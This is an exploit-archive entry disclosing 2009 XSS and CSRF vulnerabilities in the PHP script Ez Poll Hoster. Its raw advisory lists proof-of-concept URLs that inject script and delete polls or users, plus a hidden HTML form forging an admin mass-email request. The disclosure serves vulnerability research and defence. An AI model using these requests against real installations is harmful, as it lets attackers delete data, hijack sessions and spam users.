header-logo
Suggest Exploit
vendor:
Ez Poll Hoster
by:
Milos Zivanovic
7.5
CVSS
HIGH
Multiple XSS and XSRF Vulnerabilities
79,352
CWE
Product Name: Ez Poll Hoster
Affected Version From: the only one there is
Affected Version To: the only one there is
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: PHP
2009

Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities

Ez Poll Hoster is vulnerable to multiple XSS and XSRF vulnerabilities. In the user panel, an attacker can inject malicious JavaScript code in the 'pid' parameter of the 'index.php' page. Additionally, an attacker can delete a poll by providing the poll name in the 'pid' parameter of the 'delete_poll' page. In the admin panel, an attacker can inject malicious JavaScript code in the 'uid' parameter of the 'profile.php' page. An attacker can also delete a user by providing the user name in the 'uid' parameter of the 'manage' page. Furthermore, an attacker can send an email to all users by accessing the 'email' page.

Mitigation:

Input validation should be used to prevent XSS and XSRF attacks.
Source

Exploit-DB raw data:

[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]

[#]Content
 |--User panel
 |  |--XSS in user panel
 |  |--Delete poll by name
 |
 |--Admin panel
    |--XSS in admin panel
    |--Delete user by name
    |--Email all users

[#]User panel

[-]XSS in user panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete poll by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL
NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[#]Admin panel

[-]XSS in admin panel

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]

[-]Delete user by name

[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER
NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]

[-]Email all users

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
  <input type="hidden" name="subject" value="this is my subject">
  <input type="hidden" name="message" value="this is my message">
  <input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]

[#] EOF